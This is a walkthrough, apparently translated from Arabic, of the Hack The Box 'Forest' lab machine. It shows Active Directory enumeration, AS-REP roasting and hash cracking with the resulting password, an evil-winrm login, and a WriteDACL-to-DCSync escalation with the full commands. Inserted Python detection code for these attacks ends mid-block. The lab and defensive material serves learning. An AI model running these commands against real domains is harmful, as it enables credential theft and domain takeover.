Forest - in Arabic

Forest walkthrough, in Arabic

Recon

1- First, run an nmap scan against the machine to see the open ports, the services behind them, and which of them is vulnerable so you can exploit it. Naturally, without recon or enumeration you can't start any pentesting or hacking.

nmap -sV -sC -p- <IP>

2- As we can see here, there are a few interesting things: kerberos, ldap, msrpc and smb.

SMB

I'll use two tools, smbclient and smbmap.

smbmap -H 10.10.10.161
[+] IP: 10.10.10.161:445 Name: FOREST.htb.local
smbclient -L 10.10.10.161
Anonymous login successful
Sharename Type Comment
--------- ---- -------
SMB1 disabled -- no workgroup available

I added the domain to /etc/hosts.

It wasn't very useful though; it can help with DNS enum but not much beyond that. I also tried nmap's scripts, with no result.

We're not done yet, so let's continue.

MSRPC

rpcclient -U "" -N 10.10.10.161

Now you'll get a prompt:

rpcclient $>

Now we can start enumerating.

enumdomusers
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[DefaultAccount] rid:[0x1f7]
user:[$331000-VK4ADACQNUCA] rid:[0x463]
user:[SM_2c8eef0a09b545acb] rid:[0x464]
user:[SM_ca8c2ed5bdab4dc9b] rid:[0x465]
user:[SM_75a538d3025e4db9a] rid:[0x466]
user:[SM_681f53d4942840e18] rid:[0x467]
user:[SM_1b41c9286325456bb] rid:[0x468]
user:[SM_9b69f1b9d2cc45549] rid:[0x469]
user:[SM_7c96b981967141ebb] rid:[0x46a]
user:[SM_c75ee099d0a64c91b] rid:[0x46b]
user:[SM_1ffab36a2f5f479cb] rid:[0x46c]
user:[HealthMailboxc3d7722] rid:[0x46e]
user:[HealthMailboxfc9daad] rid:[0x46f]
user:[HealthMailboxc0a90c9] rid:[0x470]
user:[HealthMailbox670628e] rid:[0x471]
user:[HealthMailbox968e74d] rid:[0x472]
user:[HealthMailbox6ded678] rid:[0x473]
user:[HealthMailbox83d6781] rid:[0x474]
user:[HealthMailboxfd87238] rid:[0x475]
user:[HealthMailboxb01ac64] rid:[0x476]
user:[HealthMailbox7108a4e] rid:[0x477]
user:[HealthMailbox0659cc1] rid:[0x478]
user:[sebastien] rid:[0x479]
user:[lucinda] rid:[0x47a]
user:[svc-alfresco] rid:[0x47b]
user:[andy] rid:[0x47e]
user:[mark] rid:[0x47f]
user:[santi] rid:[0x480]

I saved the results to a file and used this command to pull out just the names:

awk '{print $1}' rpc_users.txt | egrep -o '\[.*.\]' | sed -e 's/\[//g; s/\]//g'
Administrator
Guest
krbtgt
DefaultAccount
$331000-VK4ADACQNUCA
SM_2c8eef0a09b545acb
SM_ca8c2ed5bdab4dc9b
SM_75a538d3025e4db9a
SM_681f53d4942840e18
SM_1b41c9286325456bb
SM_9b69f1b9d2cc45549
SM_7c96b981967141ebb
SM_c75ee099d0a64c91b
SM_1ffab36a2f5f479cb
HealthMailboxc3d7722
HealthMailboxfc9daad
HealthMailboxc0a90c9
HealthMailbox670628e
HealthMailbox968e74d
HealthMailbox6ded678
HealthMailbox83d6781
HealthMailboxfd87238
HealthMailboxb01ac64
HealthMailbox7108a4e
HealthMailbox0659cc1
sebastien
lucinda
svc-alfresco
andy
mark
santi

Then I dropped every name starting with SM or HealthMailbox, which leaves:

Administrator
Guest
krbtgt
sebastien
lucinda
svc-alfresco
andy
mark
santi

With the users in hand, I started gathering more data.

enumprivs #Enumerate privileges
SeCreateTokenPrivilege 0:2 (0x0:0x2)
SeAssignPrimaryTokenPrivilege 0:3 (0x0:0x3)
SeLockMemoryPrivilege 0:4 (0x0:0x4)
SeIncreaseQuotaPrivilege 0:5 (0x0:0x5)
SeMachineAccountPrivilege 0:6 (0x0:0x6)
SeTcbPrivilege 0:7 (0x0:0x7)
SeSecurityPrivilege 0:8 (0x0:0x8)
SeTakeOwnershipPrivilege 0:9 (0x0:0x9)
SeLoadDriverPrivilege 0:10 (0x0:0xa)
SeSystemProfilePrivilege 0:11 (0x0:0xb)
SeSystemtimePrivilege 0:12 (0x0:0xc)
SeProfileSingleProcessPrivilege 0:13 (0x0:0xd)
SeIncreaseBasePriorityPrivilege 0:14 (0x0:0xe)
SeCreatePagefilePrivilege 0:15 (0x0:0xf)
SeCreatePermanentPrivilege 0:16 (0x0:0x10)
SeBackupPrivilege 0:17 (0x0:0x11)
SeRestorePrivilege 0:18 (0x0:0x12)
SeShutdownPrivilege 0:19 (0x0:0x13)
SeDebugPrivilege 0:20 (0x0:0x14)
SeAuditPrivilege 0:21 (0x0:0x15)
SeSystemEnvironmentPrivilege 0:22 (0x0:0x16)
SeChangeNotifyPrivilege 0:23 (0x0:0x17)
SeRemoteShutdownPrivilege 0:24 (0x0:0x18)
SeUndockPrivilege 0:25 (0x0:0x19)
SeSyncAgentPrivilege 0:26 (0x0:0x1a)
SeEnableDelegationPrivilege 0:27 (0x0:0x1b)
SeManageVolumePrivilege 0:28 (0x0:0x1c)
SeImpersonatePrivilege 0:29 (0x0:0x1d)
SeCreateGlobalPrivilege 0:30 (0x0:0x1e)
SeTrustedCredManAccessPrivilege 0:31 (0x0:0x1f)
SeRelabelPrivilege 0:32 (0x0:0x20)
SeIncreaseWorkingSetPrivilege 0:33 (0x0:0x21)
SeTimeZonePrivilege 0:34 (0x0:0x22)
SeCreateSymbolicLinkPrivilege 0:35 (0x0:0x23)
SeDelegateSessionUserImpersonatePrivilege 0:36 (0x0:0x24)
enumdomgroups #Enumerate domain groups
group:[Enterprise Read-only Domain Controllers] rid:[0x1f2]
group:[Domain Admins] rid:[0x200]
group:[Domain Users] rid:[0x201]
group:[Domain Guests] rid:[0x202]
group:[Domain Computers] rid:[0x203]
group:[Domain Controllers] rid:[0x204]
group:[Schema Admins] rid:[0x206]
group:[Enterprise Admins] rid:[0x207]
group:[Group Policy Creator Owners] rid:[0x208]
group:[Read-only Domain Controllers] rid:[0x209]
group:[Cloneable Domain Controllers] rid:[0x20a]
group:[Protected Users] rid:[0x20d]
group:[Key Admins] rid:[0x20e]
group:[Enterprise Key Admins] rid:[0x20f]
group:[DnsUpdateProxy] rid:[0x44e]
group:[Organization Management] rid:[0x450]
group:[Recipient Management] rid:[0x451]
group:[View-Only Organization Management] rid:[0x452]
group:[Public Folder Management] rid:[0x453]
group:[UM Management] rid:[0x454]
group:[Help Desk] rid:[0x455]
group:[Records Management] rid:[0x456]
group:[Discovery Management] rid:[0x457]
group:[Server Management] rid:[0x458]
group:[Delegated Setup] rid:[0x459]
group:[Hygiene Management] rid:[0x45a]
group:[Compliance Management] rid:[0x45b]
group:[Security Reader] rid:[0x45c]
group:[Security Administrator] rid:[0x45d]
group:[Exchange Servers] rid:[0x45e]
group:[Exchange Trusted Subsystem] rid:[0x45f]
group:[Managed Availability Servers] rid:[0x460]
group:[Exchange Windows Permissions] rid:[0x461]
group:[ExchangeLegacyInterop] rid:[0x462]
group:[$D31000-NSEL5BRJ63V7] rid:[0x46d]
group:[Service Accounts] rid:[0x47c]
group:[Privileged IT Accounts] rid:[0x47d]
group:[test] rid:[0x13ed]
enumdomains # Enumerate domains
name:[HTB] idx:[0x0]
name:[Builtin] idx:[0x0]
dsenumdomtrusts # Enumerate all trusted domains in an AD forest
1 domains returned
htb.local (HTB)

Really, all I'm doing here is collecting information to understand the target better. I won't explain everything that came out, because 1- it's a lot of data and hard to walk through, and 2- I think it's fairly self-explanatory.

Let's move on to LDAP.

LDAP

nmap -n -sV --script "ldap* and not brute" 10.10.10.161

You'll get a lot of data, too much to paste here, so do the enum yourself and play with it a bit. It's fun :)

AS-REP Roasting

Now we need to step the game up a bit and try to get access to the machine, so I'll use a technique called AS-REP Roasting. The idea revolves around users that don't require something called Pre-Authentication. The topic goes deeper than that, of course, and God willing I'll explain it in an article of its own.

I used the users we extracted earlier with the GetNPUsers tool:

impacket-GetNPUsers -format hashcat -usersfile users.txt -no-pass -k -dc-ip 10.10.10.161 HTB.LOCAL/

And that's how we got the hash for the user svc-alfresco:

Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
[-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] User sebastien doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User lucinda doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$svc-alfresco@HTB.LOCAL:5fc55218d956123aa894674806657af5$24c44c1eead97538ba16fa0b68f0ded32da012141d01f123eff53709886c6c2b1bca60c097dad0ab2b892678f53af135a934c1a2ff9d6508ad35f165474727eb774ccdf81720c2bb948a561ae616408db454a0c83008f8665b4b75a0bf73205545821e1a5b366c49c1ff569b1ba7db7db791be317bc0a47c8b7b4a394109f4870c0f1463e9392cc369ff70aa0529d3382ca2b14eb84dad313d0eb2693c089761a6ca4e97b7449faf550af823c33a8bf2d4ecba4e1c9dc78010d82fd963699b613fd539ce96303390c9360646f877a160d1d0c311ea3d497878a4861f797a9030f4b779455da0
[-] User andy doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User mark doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User santi doesn't have UF_DONT_REQUIRE_PREAUTH set

Now we crack it with a tool like hashcat:

hashcat -m 18200 svc-alfresco_hash.txt rockyou.txt -d 1 # -d 1 to select my GPU

The password is s3rvice:

$krb5asrep$23$svc-alfresco@HTB.LOCAL:5fc55218d956123aa894674806657af5$24c44c1eead97538ba16fa0b68f0ded32da012141d01f123eff53709886c6c2b1bca60c097dad0ab2b892678f53af135a934c1a2ff9d6508ad35f165474727eb774ccdf81720c2bb948a561ae616408db454a0c83008f8665b4b75a0bf73205545821e1a5b366c49c1ff569b1ba7db7db791be317bc0a47c8b7b4a394109f4870c0f1463e9392cc369ff70aa0529d3382ca2b14eb84dad313d0eb2693c089761a6ca4e97b7449faf550af823c33a8bf2d4ecba4e1c9dc78010d82fd963699b613fd539ce96303390c9360646f877a160d1d0c311ea3d497878a4861f797a9030f4b779455da0:s3rvice

CREDS: svc-alfresco:s3rvice

So far we got the hash, cracked it, and got the password.
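As an added example (not part of the original write-up), here is the defender's side of this step in Python: an audit of which accounts have pre-authentication disabled, and a check over Security event 4768 text for the no-pre-auth, RC4 pattern this technique leaves in the logs. Every account record and event message below is constructed for the example.

```python
"""
Defender-side checks for the AS-REP roasting step (added example, constructed data).

  audit_preauth()          accounts carrying DONT_REQ_PREAUTH (0x400000) in
                           userAccountControl, the attribute GetNPUsers keys on
  detect_asrep_roasting()  Security event 4768 messages showing a TGT issued with
                           Pre-Authentication Type 0 and RC4 (0x17) encryption,
                           the shape of a roastable AS-REP
"""
import re

DONT_REQ_PREAUTH = 0x400000    # userAccountControl: "Do not require Kerberos preauthentication"
PREAUTH_NONE = 0               # 4768 Pre-Authentication Type: no pre-authentication performed
ETYPE_RC4_HMAC = 0x17          # 4768 Ticket Encryption Type: RC4-HMAC (hashcat mode 18200 material)
KDC_ERR_CLIENT_REVOKED = 0x12  # Result Code matching the "credentials have been revoked" lines above

# Constructed LDAP attribute dump: sAMAccountName -> userAccountControl.
# 0x200 = NORMAL_ACCOUNT, 0x10000 = DONT_EXPIRE_PASSWORD.
SAMPLE_UAC = {
    "sebastien": 0x200,
    "lucinda": 0x200,
    "svc-alfresco": 0x200 | 0x10000 | DONT_REQ_PREAUTH,
    "andy": 0x200,
}


def event_text(account, client, etype, preauth, result=0):
    """Build a 4768 message body using the field names Windows emits (constructed)."""
    return (
        "A Kerberos authentication ticket (TGT) was requested.\n"
        f"\tAccount Name:\t\t{account}\n"
        "\tSupplied Realm Name:\tHTB.LOCAL\n"
        f"\tClient Address:\t\t::ffff:{client}\n"
        f"\tResult Code:\t\t{result:#x}\n"
        f"\tTicket Encryption Type:\t{etype:#x}\n"
        f"\tPre-Authentication Type:\t{preauth}\n"
    )


# Constructed 4768 samples: a normal AES logon, a roastable request, RC4 with
# pre-auth done (legacy client, not roastable), and a revoked account.
SAMPLE_4768 = [
    event_text("sebastien", "10.10.14.7", etype=0x12, preauth=2),
    event_text("svc-alfresco", "10.10.14.7", etype=ETYPE_RC4_HMAC, preauth=PREAUTH_NONE),
    event_text("andy", "10.10.10.50", etype=ETYPE_RC4_HMAC, preauth=2),
    event_text("lucinda", "10.10.14.7", etype=ETYPE_RC4_HMAC, preauth=PREAUTH_NONE,
               result=KDC_ERR_CLIENT_REVOKED),
]

FIELD_RE = {
    "account": re.compile(r"Account Name:\s*(\S+)"),
    "client": re.compile(r"Client Address:\s*(\S+)"),
    "result": re.compile(r"Result Code:\s*(0x[0-9a-fA-F]+)"),
    "etype": re.compile(r"Ticket Encryption Type:\s*(0x[0-9a-fA-F]+)"),
    "preauth": re.compile(r"Pre-Authentication Type:\s*(\d+)"),
}


def parse_4768(text):
    """Extract the fields the detection needs from one 4768 message body."""
    ev = {}
    for key, rx in FIELD_RE.items():
        m = rx.search(text)
        if m is None:
            raise ValueError(f"4768 message is missing field: {key}")
        ev[key] = m.group(1)
    ev["result"] = int(ev["result"], 16)
    ev["etype"] = int(ev["etype"], 16)
    ev["preauth"] = int(ev["preauth"])
    ev["client"] = ev["client"].replace("::ffff:", "")  # drop the IPv4-mapped prefix
    return ev


def audit_preauth(uac_by_account):
    """Accounts whose userAccountControl has DONT_REQ_PREAUTH set (the ones to fix)."""
    return sorted(n for n, uac in uac_by_account.items() if uac & DONT_REQ_PREAUTH)


def detect_asrep_roasting(messages):
    """(account, client) pairs for successful TGTs issued without pre-auth using RC4."""
    hits = []
    for text in messages:
        ev = parse_4768(text)
        if ev["result"] == 0 and ev["preauth"] == PREAUTH_NONE and ev["etype"] == ETYPE_RC4_HMAC:
            hits.append((ev["account"], ev["client"]))
    return hits


if __name__ == "__main__":
    print("pre-auth disabled:", audit_preauth(SAMPLE_UAC))
    print("roastable AS-REPs:", detect_asrep_roasting(SAMPLE_4768))
```

Clearing the flag on the account, or at least enforcing AES-only encryption types for it, removes the offline-crackable material this check looks for.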

Now let's redo the enum with the username and password we got, using crackmapexec:

crackmapexec smb 10.10.10.161 -u 'svc-alfresco' -p 's3rvice' /forest.htb.local
WINRM 10.10.10.161 5985 FOREST [*] Windows 10.0 Build 14393 (name:FOREST) (domain:htb.local)
WINRM 10.10.10.161 5985 FOREST [*] http://10.10.10.161:5985/wsman
WINRM 10.10.10.161 5985 FOREST [+] htb.local\svc-alfresco:s3rvice (Pwn3d!)

This means we can log in to the machine with the creds we have, but we won't log in just yet; more enum first.

SMB with svc-alfresco account

smbmap -H 10.10.10.161 -u 'svc-alfresco' -p 's3rvice'
[+] IP: 10.10.10.161:445 Name: FOREST.htb.local
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ READ ONLY Remote IPC
NETLOGON READ ONLY Logon server share
SYSVOL READ ONLY Logon server share
smbclient -L 10.10.10.161 -U 'svc-alfresco'
Enter WORKGROUP\svc-alfresco's password:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share

Nothing interesting here. I checked them all and there's nothing important, so on to winrm.

Get Access

evil-winrm -i 10.10.10.161 -u 'svc-alfresco' -p 's3rvice'
Evil-WinRM shell v2.4
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents>

Post-Exploitation

Go grab user.txt on your own, of course. I'll upload powerview.ps1 and enumerate the machine.

A lot of enum, a lot of info.

PowerView.ps1

upload powerview.ps1 # if powerview isn't in the current directory, give the tool's full path
. .\powerview.ps1 # import the modules

We'll do a bit of enum, then I'll switch to more automated tools.

Get-NetDomain
Forest : htb.local
DomainControllers : {FOREST.htb.local}
Children : {}
DomainMode : Unknown
DomainModeLevel : 7
Parent :
PdcRoleOwner : FOREST.htb.local
RidRoleOwner : FOREST.htb.local
InfrastructureRoleOwner : FOREST.htb.local
Name : htb.local
Get-DomainSID
S-1-5-21-3072663084-364016917-1341370565
Get-DomainPolicy
Unicode : @{Unicode=yes}
SystemAccess : @{MinimumPasswordAge=1; MaximumPasswordAge=42; LockoutBadCount=0; PasswordComplexity=0; RequireLogonToChangePassword=0; LSAAnonymousNameLookup=0; ForceLogoffWhenHourExpire=0; PasswordHistorySize=24; ClearTextPassword=0;
MinimumPasswordLength=7}
RegistryValues : @{MACHINE\System\CurrentControlSet\Control\Lsa\NoLMHash=System.String[]}
KerberosPolicy : @{MaxTicketAge=10; MaxServiceAge=600; MaxClockSkew=5; MaxRenewAge=7; TicketValidateClient=1}
Version : @{Revision=1; signature="$CHICAGO$"}
Get-NetDomainController
Forest : htb.local
CurrentTime : 5/8/2021 8:29:17 PM
HighestCommittedUsn : 469291
OSVersion : Windows Server 2016 Standard
Roles : {SchemaRole, NamingRole, PdcRole, RidRole...}
Domain : htb.local
IPAddress : ::1
SiteName : Default-First-Site-Name
SyncFromAllServersCallback :
InboundConnections : {}
OutboundConnections : {}
Name : FOREST.htb.local
Partitions : {DC=htb,DC=local, CN=Configuration,DC=htb,DC=local, CN=Schema,CN=Configuration,DC=htb,DC=local, DC=DomainDnsZones,DC=htb,DC=local...}
Get-NetUser | select cn
cn
--
Administrator
Guest
DefaultAccount
krbtgt
Exchange Online-ApplicationAccount
SystemMailbox{1f05a927-89c0-4725-adca-4527114196a1}
SystemMailbox{bb558c35-97f1-4cb9-8ff7-d53741dc928c}
SystemMailbox{e0dc1c29-89c3-4034-b678-e6c29d823ed9}
DiscoverySearchMailbox {D919BA05-46A6-415f-80AD-7E09334BB852}
Migration.8f3e7716-2011-43e4-96b1-aba62d229136
FederatedEmail.4c1f4d8b-8179-4148-93bf-00a95fa1e042
SystemMailbox{D0E409A0-AF9B-4720-92FE-AAC869B0D201}
SystemMailbox{2CE34405-31BE-455D-89D7-A7C7DA7A0DAA}
SystemMailbox{8cc370d3-822a-4ab8-a926-bb94bd0641a9}
HealthMailboxc3d7722415ad41a5b19e3e00e165edbe
HealthMailboxfc9daad117b84fe08b081886bd8a5a50
HealthMailboxc0a90c97d4994429b15003d6a518f3f5
HealthMailbox670628ec4dd64321acfdf6e67db3a2d8
HealthMailbox968e74dd3edb414cb4018376e7dd95ba
HealthMailbox6ded67848a234577a1756e072081d01f
HealthMailbox83d6781be36b4bbf8893b03c2ee379ab
HealthMailboxfd87238e536e49e08738480d300e3772
HealthMailboxb01ac647a64648d2a5fa21df27058a24
HealthMailbox7108a4e350f84b32a7a90d8e718f78cf
HealthMailbox0659cc188f4c4f9f978f6c2142c4181e
Sebastien Caron
Lucinda Berger
svc-alfresco
Andy Hislip
Mark Brandt
Santi Rodriguez
Get-UserProperty -Properties badpwdcount
name badpwdcount
---- -----------
Administrator 0
Guest 0
DefaultAccount 0
krbtgt 0
Exchange Online-ApplicationAccount 0
SystemMailbox{1f05a927-89c0-4725-adca-4527114196a1} 0
SystemMailbox{bb558c35-97f1-4cb9-8ff7-d53741dc928c} 0
SystemMailbox{e0dc1c29-89c3-4034-b678-e6c29d823ed9} 0
DiscoverySearchMailbox {D919BA05-46A6-415f-80AD-7E09334BB852} 0
Migration.8f3e7716-2011-43e4-96b1-aba62d229136 0
FederatedEmail.4c1f4d8b-8179-4148-93bf-00a95fa1e042 0
SystemMailbox{D0E409A0-AF9B-4720-92FE-AAC869B0D201} 0
SystemMailbox{2CE34405-31BE-455D-89D7-A7C7DA7A0DAA} 0
SystemMailbox{8cc370d3-822a-4ab8-a926-bb94bd0641a9} 0
HealthMailboxc3d7722415ad41a5b19e3e00e165edbe 0
HealthMailboxfc9daad117b84fe08b081886bd8a5a50 0
HealthMailboxc0a90c97d4994429b15003d6a518f3f5 0
HealthMailbox670628ec4dd64321acfdf6e67db3a2d8 0
HealthMailbox968e74dd3edb414cb4018376e7dd95ba 0
HealthMailbox6ded67848a234577a1756e072081d01f 0
HealthMailbox83d6781be36b4bbf8893b03c2ee379ab 0
HealthMailboxfd87238e536e49e08738480d300e3772 0
HealthMailboxb01ac647a64648d2a5fa21df27058a24 0
HealthMailbox7108a4e350f84b32a7a90d8e718f78cf 0
HealthMailbox0659cc188f4c4f9f978f6c2142c4181e 0
Sebastien Caron 0
Lucinda Berger 0
svc-alfresco 0
Andy Hislip 0
Mark Brandt 0
Santi Rodriguez 0
Get-UserProperty -Properties pwdlastset
name pwdlastset
---- ----------
Administrator 9/18/2019 10:09:08 AM
Guest 12/31/1600 4:00:00 PM
DefaultAccount 12/31/1600 4:00:00 PM
krbtgt 9/18/2019 3:53:23 AM
Exchange Online-ApplicationAccount 12/31/1600 4:00:00 PM
SystemMailbox{1f05a927-89c0-4725-adca-4527114196a1} 12/31/1600 4:00:00 PM
SystemMailbox{bb558c35-97f1-4cb9-8ff7-d53741dc928c} 12/31/1600 4:00:00 PM
SystemMailbox{e0dc1c29-89c3-4034-b678-e6c29d823ed9} 12/31/1600 4:00:00 PM
DiscoverySearchMailbox {D919BA05-46A6-415f-80AD-7E09334BB852} 12/31/1600 4:00:00 PM
Migration.8f3e7716-2011-43e4-96b1-aba62d229136 12/31/1600 4:00:00 PM
FederatedEmail.4c1f4d8b-8179-4148-93bf-00a95fa1e042 12/31/1600 4:00:00 PM
SystemMailbox{D0E409A0-AF9B-4720-92FE-AAC869B0D201} 12/31/1600 4:00:00 PM
SystemMailbox{2CE34405-31BE-455D-89D7-A7C7DA7A0DAA} 12/31/1600 4:00:00 PM
SystemMailbox{8cc370d3-822a-4ab8-a926-bb94bd0641a9} 12/31/1600 4:00:00 PM
HealthMailboxc3d7722415ad41a5b19e3e00e165edbe 9/23/2019 3:51:31 PM
HealthMailboxfc9daad117b84fe08b081886bd8a5a50 9/23/2019 3:51:35 PM
HealthMailboxc0a90c97d4994429b15003d6a518f3f5 9/19/2019 4:56:35 AM
HealthMailbox670628ec4dd64321acfdf6e67db3a2d8 9/19/2019 4:56:45 AM
HealthMailbox968e74dd3edb414cb4018376e7dd95ba 9/19/2019 4:56:56 AM
HealthMailbox6ded67848a234577a1756e072081d01f 9/19/2019 4:57:06 AM
HealthMailbox83d6781be36b4bbf8893b03c2ee379ab 9/19/2019 4:57:17 AM
HealthMailboxfd87238e536e49e08738480d300e3772 9/19/2019 4:57:27 AM
HealthMailboxb01ac647a64648d2a5fa21df27058a24 9/19/2019 4:57:37 AM
HealthMailbox7108a4e350f84b32a7a90d8e718f78cf 9/19/2019 4:57:48 AM
HealthMailbox0659cc188f4c4f9f978f6c2142c4181e 9/19/2019 4:57:58 AM
Sebastien Caron 9/19/2019 5:29:59 PM
Lucinda Berger 9/19/2019 5:44:13 PM
svc-alfresco 5/8/2021 1:49:05 PM
Andy Hislip 9/22/2019 3:44:16 PM
Mark Brandt 9/20/2019 3:57:30 PM
Santi Rodriguez 9/20/2019 4:02:55 PM
Get-UserProperty -Properties logoncount
name logoncount
---- ----------
Administrator 49
Guest 0
DefaultAccount 0
krbtgt 0
Exchange Online-ApplicationAccount 0
SystemMailbox{1f05a927-89c0-4725-adca-4527114196a1} 0
SystemMailbox{bb558c35-97f1-4cb9-8ff7-d53741dc928c} 0
SystemMailbox{e0dc1c29-89c3-4034-b678-e6c29d823ed9} 0
DiscoverySearchMailbox {D919BA05-46A6-415f-80AD-7E09334BB852} 0
Migration.8f3e7716-2011-43e4-96b1-aba62d229136 0
FederatedEmail.4c1f4d8b-8179-4148-93bf-00a95fa1e042 0
SystemMailbox{D0E409A0-AF9B-4720-92FE-AAC869B0D201} 0
SystemMailbox{2CE34405-31BE-455D-89D7-A7C7DA7A0DAA} 0
SystemMailbox{8cc370d3-822a-4ab8-a926-bb94bd0641a9} 0
HealthMailboxc3d7722415ad41a5b19e3e00e165edbe 1470
HealthMailboxfc9daad117b84fe08b081886bd8a5a50 59
HealthMailboxc0a90c97d4994429b15003d6a518f3f5 0
HealthMailbox670628ec4dd64321acfdf6e67db3a2d8 0
HealthMailbox968e74dd3edb414cb4018376e7dd95ba 0
HealthMailbox6ded67848a234577a1756e072081d01f 0
HealthMailbox83d6781be36b4bbf8893b03c2ee379ab 0
HealthMailboxfd87238e536e49e08738480d300e3772 0
HealthMailboxb01ac647a64648d2a5fa21df27058a24 0
HealthMailbox7108a4e350f84b32a7a90d8e718f78cf 0
HealthMailbox0659cc188f4c4f9f978f6c2142c4181e 0
Sebastien Caron 8
Lucinda Berger 0
svc-alfresco 6
Andy Hislip 0
Mark Brandt 0
Santi Rodriguez 0
Get-NetComputer # you can use '-FullData' and get much more info, or use 'select' with it to pick what you want
FOREST.htb.local
EXCH01.htb.local
Get-NetGroup
Administrators
Users
Guests
Print Operators
Backup Operators
Replicator
Remote Desktop Users
Network Configuration Operators
Performance Monitor Users
Performance Log Users
Distributed COM Users
IIS_IUSRS
Cryptographic Operators
Event Log Readers
Certificate Service DCOM Access
RDS Remote Access Servers
RDS Endpoint Servers
RDS Management Servers
Hyper-V Administrators
Access Control Assistance Operators
Remote Management Users
System Managed Accounts Group
Storage Replica Administrators
Domain Computers
Domain Controllers
Schema Admins
Enterprise Admins
Cert Publishers
Domain Admins
Domain Users
Domain Guests
Group Policy Creator Owners
RAS and IAS Servers
Server Operators
Account Operators
Pre-Windows 2000 Compatible Access
Incoming Forest Trust Builders
Windows Authorization Access Group
Terminal Server License Servers
Allowed RODC Password Replication Group
Denied RODC Password Replication Group
Read-only Domain Controllers
Enterprise Read-only Domain Controllers
Cloneable Domain Controllers
Protected Users
Key Admins
Enterprise Key Admins
DnsAdmins
DnsUpdateProxy
Organization Management
Recipient Management
View-Only Organization Management
Public Folder Management
UM Management
Help Desk
Records Management
Discovery Management
Server Management
Delegated Setup
Hygiene Management
Compliance Management
Security Reader
Security Administrator
Exchange Servers
Exchange Trusted Subsystem
Managed Availability Servers
Exchange Windows Permissions
ExchangeLegacyInterop
$D31000-NSEL5BRJ63V7
Service Accounts
Privileged IT Accounts
test

There are still many other ways and commands we could use to gather information, but that would make this far too long, so I'll start with SharpHound.ps1.

PrivEsc

upload SharpHound.ps1
. .\SharpHound.ps1
Invoke-Bloodhound -CollectionMethod All -Domain htb.local -LDAPUser svc-alfresco -LDAPPass s3rvice
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 5/8/2021 2:02 PM 15384 20210508140254_BloodHound.zip
download 20210508140254_BloodHound.zip

Upload this file into BloodHound, then go to Analysis, then click Find Shortest Paths to Domain Admins and it will look like this:

Honestly, I dropped everything and went after EXCHANGE WINDOWS PERMISSIONS@HTB.LOCAL, because it caught my eye and I'd spotted it in several other places. The second thing that caught my attention was WriteDACL, for two reasons: 1- I'm sure I've read about it before; 2- I don't remember, or don't know, what it is, so I was curious to find out. I did my research, and the first thing that came up was:

After studying the topic I went back to analyzing. Here, the first thing I did was 1- mark our user as owned, 2- click on it, 3- a list appears; click Node Info, 4- click Reachable High Value Targets. Now things look nicer (don't ask why, just accept that they do).

So what do you see here? Don't worry, I'll tell you: our user svc-alfresco is a member of the Service Accounts group, which in turn is a member of the Privileged IT Accounts group, which in turn is a member of the Account Operators group, which in turn leads to Exchange Windows Permissions, and the Exchange Windows Permissions group has the permission called WriteDACL (didn't get it? Simple! Read it again). All of this means that, by default, our user, or any user who ends up in this group, has permission to modify the domain itself.

I tried a bunch of tools to exploit this and they didn't work, but what I noticed is that the exploitation goes like this: 1- create a user, 2- add the user to the Exchange Windows Permissions group, 3- import PowerView.ps1, 4- use the Add-DomainObjectAcl function, 5- use secretsdump with the new user to dump the other users' hashes.

The commands:

net user mhzcyber PlzhackIT /add /domain
net group "Exchange Windows Permissions" /add mhzcyber
$SecPassword = ConvertTo-SecureString 'PlzhackIT' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('HTB\mhzcyber', $SecPassword)
Add-DomainObjectAcl -Credential $Cred -TargetIdentity "DC=htb,DC=local" -PrincipalIdentity mhzcyber -Rights DCSync # this will need you to use PowerView.ps1

OK, so how did I know how to exploit it? People have explained it, plus if you right-click the WriteDACL edge inside BloodHound you'll find Help?; click it, then Abuse Info, and you'll find an explanation.

WriteDACL -> ? Help -> Abuse Info.
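An added example (not the author's code) of what this chain looks like from the defender's side: Python that correlates Security events 4720 (user created), 4756 (member added to a universal group) and 4662 (directory object access) to flag a non-DC account requesting replication rights. The event IDs, the replication control-access GUIDs and the Exchange Windows Permissions group are real; the sample events themselves are constructed.

```python
"""
Detecting the WriteDACL -> DCSync chain from the PrivEsc section (added example,
constructed events). Correlates three Windows Security event types:
  4720  a user account was created
  4756  a member was added to a security-enabled universal group
  4662  an operation was performed on an object (only logged when "Audit Directory
        Service Access" is on and the domain head carries a SACL for it)
A non-DC principal asking for the replication control access rights is the DCSync
signature; a fresh 4720 for that account or a membership change into Exchange
Windows Permissions raises the severity.
"""
from datetime import datetime, timedelta

# Control access rights that secretsdump's DRSUAPI path exercises.
DS_REPLICATION_GET_CHANGES = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"
DS_REPLICATION_GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"
REPLICATION_GUIDS = {DS_REPLICATION_GET_CHANGES, DS_REPLICATION_GET_CHANGES_ALL}

WATCHED_GROUPS = {"exchange windows permissions"}
NEW_ACCOUNT_WINDOW = timedelta(hours=24)
NOT_REPLICATION = "00000000-0000-0000-0000-000000000000"  # placeholder for any other right


def ts(s):
    return datetime.strptime(s, "%Y-%m-%d %H:%M:%S")


# Constructed, already-parsed events (oldest first); names mirror the write-up.
SAMPLE_EVENTS = [
    {"id": 4720, "time": ts("2021-05-08 14:20:01"), "subject": "svc-alfresco", "target": "mhzcyber"},
    {"id": 4756, "time": ts("2021-05-08 14:20:09"), "subject": "svc-alfresco", "target": "mhzcyber",
     "group": "Exchange Windows Permissions"},
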